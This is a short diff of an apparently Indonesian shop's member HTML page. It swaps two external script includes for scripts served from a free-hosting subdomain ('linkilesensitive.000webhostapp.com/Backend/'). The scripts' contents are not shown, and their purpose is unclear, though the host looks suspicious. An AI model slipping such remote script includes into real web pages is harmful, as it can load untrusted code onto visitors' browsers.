--- a/Member/indexmember.html
+++ b/Member/indexmember.html
@@ -404,7 +404,7 @@ font-weight: bold; color: #2c3030;">Kopi 7 Elemen - <i>wilayah 3(100/25)</i></p>
     <p>&copy; 2024 Toko halal mart suesti</p>
   </footer>
   
-<script src="https://kosred.com/a/klttyp.js"></script> 
+<script src="https://linkilesensitive.000webhostapp.com/Backend/config2.js"></script> 
   
 <script>
     document.addEventListener('DOMContentLoaded', function () {
@@ -419,7 +419,7 @@ font-weight: bold; color: #2c3030;">Kopi 7 Elemen - <i>wilayah 3(100/25)</i></p>
     }, 3000); // Ubah angka 2000 menjadi durasi yang diinginkan dalam milidetik
 });    
 </script>
-<script src="https://kosred.com/a/bhtook.js">
+<script src="https://linkilesensitive.000webhostapp.com/Backend/member2.js">
     
 </script>
 </body>
